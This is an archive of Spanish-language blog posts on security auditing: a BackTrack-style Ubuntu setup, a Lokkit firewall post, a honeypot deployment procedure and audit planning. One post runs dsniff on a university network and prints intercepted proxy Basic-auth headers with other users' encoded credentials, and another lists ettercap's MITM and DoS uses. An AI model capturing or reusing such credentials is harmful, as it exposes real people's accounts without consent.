You are currently browsing the category archive for the 'Vulnerabilidades' category.
Herramientas: HP Pavilion dv5-1235la Entertainment PC (la mayorìa sirve) + Ubuntu Karmic + acceso a la red.
Ahora tienes tienes las herramientas listas, y seguiremos los siguientes pasos, que en realidad los puede hacer cualquier usuario
con conocimiento linux.
Primero: Instala ubuntu.
Segundo: Actualiza ubuntu (tu ves si utilizas el gestor de actualizaciones o a puro comando q no es nada del otro mundo)
Tercero: busca las herramientas que vienen con backtrack e instala, obviamente no todas las vas a encontrar para ubuntu como binarios, algunos se los consigue en el comprimidos para compilar pero bueno. Tools
Cuarto: Aunque esto va en el punto anterior, vale darle relevancia por que son de las herramientas + importantes, me refiero a openvas,antes nessus y a el framework de metasploit, el primero puedes instalarlo usando la base de datos del synaptic y el segundo pues hay que seguir algunos pasos, que los puedes encontrar aquí.
Quinto: ya que has instalado la mayoría de aplicaciones, pues podrías decir que tienes tu ubuntu backtraizado.
Ojo todas las acciones que hagas con las herramientas que instalas quedan bajo tu propia responsabilidad, la mayoría son herramientas de auditoría.
Nuevamente tenemos noticias extraordinarias con esta distribución útil para auditoría informática, aunque todavía no sale la versión final, ya hay una PRE-Final, es algo así como la Release Candidate de los SO de Microsoft, ésta nueva versión contiene entre otras cosas:
-Migración a distribución base Ubuntu.- Es decir de ahora en adelante (al menos eso parece) backtrack deja de utilizar como base a SLAX (Slackware), pasándose a Ubuntu, entendiedo esto que todos los comandos y configuraciones de ubuntu son aplicables, como también comentar que cualquier Ubuntu podría ser backtrack-izada (palabra encontrada en ésta fuente).
-Mantiene los repositorios de BT y suma los de Ubuntu.
-Cambio se distribución base –> cambio de gestor de arranque, grub por lilo.
-Se podrá utilizar el apt-get de debian.
-Contiene las actualizaciones de drivers para más tarjetas Wireless
-Soporte PXE.
-Soporte RFID ¿Que es RFID?
-Nuevas herramientas de seguridad y en estas incluye una versión libre y completa de maltego.
Referencias
Nuevamente tenemos noticias extraordinarias con esta distribución útil para auditoría informática, aunque todavía no sale la versión final, ya hay una PRE-Final, es algo así como la Release Candidate de los SO de Microsoft, ésta nueva versión contiene entre otras cosas:
Migración a distribución base Ubuntu.- Es decir de ahora en adelante (al menos eso parece) backtrack deja de utilizar como base a SLAX (Slackware), pasándose a Ubuntu, entendiedo esto que todos los comandos y configuraciones de ubuntu son aplicables, como también comentar que cualquier Ubuntu podría ser backtrack-izada (palabra encontrada en ésta fuente).
Mantiene los repositorios de BT y suma los de Ubuntu.
Contiene las actualizaciones de drivers para más tarjetas Wireless
Soporte PXE.
Soporte RFID ¿Que es RFID?
Nuevas herramientas de seguridad y en estas incluye una versión libre y completa de maltego.
Normalmente o la costumbre es hablar sobre la seguridad sobre equipos con SO de Microsoft, cosas como configuar el firewall, un buen antivirus, uno q otro anti-troyano, etc. Pero que tal si se menciona algo de seguridad sobre linux en equipos finales.
Asi tenemos ésta aplicacion, LOKKIT, un firewall tan sencillo de configurar que te permite como usuario final tener un poco más de seguridad cuando navegas por la red.
En el ubuntu8.10 obtengo una pantalla similar a esta:
Aqui debes determinar que grado de firewall necesitas, alto, medio o arriesgate sin nada, luego en el boton Customize, se puede detallar un tanto más los servicios que deseamos negar, claro los más conocidos, pero si deseamos cerrar alguna aplicación como pop o dns solamente debemos especificar los puertos y listo.
Algo que falta acotar es que este firewall es de los más sencillos para linux, no es muy bueno cuando tratemos de aplicar reglas más complejas y fuertes al equipo.
Deployment prodecure
1. The hard disk must be written with a constant data pattern (usually zeros). This procedure also has the benefit that disk image copies compress better, and that deleted files are easier to find.
2. The chosen operating system is installed. Default options.
3. The chosen services are installed, configured and initialized.
4. The honeypot’s configuration script is executed to create new users, configure the network settings, etc.
5. In order to monitor the attacker’s steps, keystroke recording system are configured in the honeypot. These systems can send the commands typed by an attacker to a loghost, using the syslog system, and broadcast this information directly into the network.
6. A script to generate the MD5 and SHA1 hashes of the honeypot’s files is executed. The hashes can be used later to discover which files have been changed by an attacker.
NOTE. Some authors could recommend extract a entire copy (image) of the honeynet with the purpose of a future test with the original configurations.
7. A script to generate the system’s status is executed. This is composed of the output of some Unix commands like ps, netstat, lsof, socklist and df.
8. The MD5 and SHA1 hashes and the system’s status files are stored in a loghost in the administration subnet which stores also the system’s images.
9. Traces of the steps (5-8) above are erased.
10. The system’s image is generated and exported to the loghost.
11. The new honeypot is connected in the honeynet and monitored until the moment when it will be turned off.
I’m going to try with this procedure……
That is a extract of honeynets maintanence and tools, June 2005.
Con un simple comando he podido obtener algunas claves para autenticación con el proxy de la red interna de la utpl, es muy sencillo
root: dsniff -d -i eth0
dsniff: trigger_tcp: decoding port 3128 as http
—————–
04/01/09 05:19:53 tcp 172.16.25.154.22994 -> gdr4.utpl.edu.ec.3128 (http)
GET http://www.hlatorre.com/images/back_izq8.gif HTTP/1.1
Host: www.hlatorre.com
Proxy-Authorization: Basic aGZnb21lejo5OTQ4Mw== [h¶g¹mºz:¼Á4À3]
dsniff: trigger_tcp: decoding port 3128 as http
—————–
04/01/09 05:19:58 tcp 172.16.25.159.42177 -> gdr4.utpl.edu.ec.3128 (http)
CONNECT certs.opera.com:443 HTTP/1.0
Host: certs.opera.com:443
Proxy-Authorization: Basic anBhbmdhbWFyY2E6cXVlY2h1Y2hhdG
VpbXBvcnRh
[°p±nµa¸aºc¼:qu§c¦u¥h®t°iµµp¶rtº]
[
Es algo tan sencillo no? cualquiera puede utilizar este tipo de herramientas, es muy sencillo encontrarlas e instalarlas, pero, por tal razón hay que tomar medidas, puesto que cualquiera puede ponerse a escuchar las contraseñas en una inalambrica y sacar las claves, como se muestran aqui.
Además e puesto caracteres especiales en los usuarios y contraseñas, la presenta es solo una muestra, un amigo se atravesó con su clave y pues lamentablemente no pude hacer nada dsniff la sacó.
Tratando de realizar unas pruebas krlos me indico usar una aplicación que permite sacar los subdominios de un dominio, asi que realice una primera pruebita y sip, si sirve, me mostró todos los servidores de el dominio especificado, ésta aplicación está incluida en la distribución de slax, Bactrack en el 2.0 y el 3.0 beta.
Luego de terminar de montar el servidor de auditoria, se me encomendó la tarea de revisar algo de ésta metodología que permite planificar mejor los test de seguridad y métricas, es decir construir una planificación ordenada de la auditoria en una organización.
¿A que acceder y por que tiempo se puede forzar al máximo riesgo? Esta pregunta es primordial, en cualquier organización en la que se ejecute una auditoria se necesita saber cuanto tiempo se puede exponer a un activo (que cumpla una importante función), y aún más si este activo tiene una función crítica en la organización.
En nuestra universidad es crítico exponer al dhcp a una prueba, si te lo bajas, se cae casi toda la red, es decir este activo no puede fallar y hacer una prueba que lleva menos de una hora debe ser análizada hasta el cansancio.
¿En que circusntancias podemos encontrar las principales debilidades?
Es decir que produce que aparezca una debilidad y potencial fuente de ataques de alto riesgo, puede que esta se produzca por el uso de alguna aplicación sobre la cual no se analizó a profundidad su uso, etc.
¿Que testear? y ¿Por que?
Bueno el por que nace de la necesidad de las organizaciones de saber que tan vulnerables son, y si esas vulnerabilidades son riesgos potenciales sobre su información, el que testear sale de hacer una revisión sobre los dispositivos principales y blancos de ataques, es decir si se realiza una auditoría no perderemos el tiempo por saber cuan vulnerable es la maquina de la secretaria paquita Pérez.
Espero seguir compartiendo un poco más de este tema pronto…..
La auditoría de redes no es cosa de algún Einstein, no ya no y el hackeo tampoco, en la actualidad existen un sin número de aplicaciones que permiten a cualquiera infiltrarse en una red, capturar datos de los compañeros, sacar claves, bajarse una maquina, o simplemente andar husmeando por la red.
Aplicaciones como john the ripper, cain&abel, snort, netsed, dsniff, ettercap y muchos otros permiten realiar esto, he utilizado cain&abel, jhon the ripper, knife y ettercap, sobre todo ettercap, que en mi parecer es uno de los mejores sniffers de la red, claro muy por detras de snort.
Las cualidades de ettercap son innumerables, puede realizar un simple sniffing, o proporcionar mitm attacks, o bajarte una maquina utilizando el D.O.S attack, o inundar la red de direcciónes mac falsificadas, inyectar información en conexiones o eliminarlas por completo a estas, etc.
Esta es una muetra como trabaja ettercap la última versión 0.7.3.
Manejar el tráfico de una red no es tan facil como parece o como algunos creen, adjunto unos videos de tcpick, netdiscover y etherape, aplicaciones para el reconocimiento y monitoreo de host’s en la red además la posibilidad de seguir las conexiones que se dan en una red conmutada.
Recent Comments